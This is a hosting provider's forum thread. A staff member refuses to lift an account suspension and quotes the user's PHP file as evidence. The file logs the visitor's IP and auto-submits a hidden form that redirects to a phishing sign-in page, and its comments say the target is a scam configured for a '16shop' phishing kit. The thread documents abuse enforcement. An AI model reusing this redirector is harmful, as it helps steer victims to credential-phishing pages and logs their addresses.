Jump to content

[Solved] suspended account


Recommended Posts

My account was suspended I think it was due to multiple accounts. Pls deleted the other on Johnny server it was created as a test domain name is secure-network manager.heliohost.org

With username boneman.

 

Pls unsuspend my other account with username Jujujay

Link to comment
Share on other sites

Chrome just started flagging your domain as malware, so you're now permanently suspended.

 

Looking at the contents, I agree with it's detection (IP logger and a redirect to what is likely a phishing site that wasn't uploaded yet). It even mentions in the code that it's supposed to be a redirect to a scam site.

 

HelioHost does not condone illegal activity of any type, including phishing or the use of malware or malicious scripts.

<?php
$url = "https://secure-support.heliohost.us/Page/signin/app/signin"; // URL scam anda (Wajib menggunakan HTTPS)
$password = "16shop"; // Password Scam (sesuaikan dengan password di config scam)

function getUserIPs()
{
    $client  = @$_SERVER['HTTP_CLIENT_IP'];
    $forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
    $remote  = $_SERVER['REMOTE_ADDR'];

    if(filter_var($client, FILTER_VALIDATE_IP))
    {
        $ip = $client;
    }
    elseif(filter_var($forward, FILTER_VALIDATE_IP))
    {
        $ip = $forward;
    }
    else
    {
        $ip = $remote;
    }

    return $ip;
}

$ip = getUserIPs();
?>

<html>
    <title>Redirecting.....</title>
    <body onload="document.form.submit()">
                <form name="form" id="form" action="<?php echo $url;?>" method="POST">
                <div style="display:none;">
                <input name="<?php echo md5($ip);?>" value="<?php echo md5($password);?>">
                <input type="submit" value="Continue">
                </div>
                </form>
        </body>
</html>

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...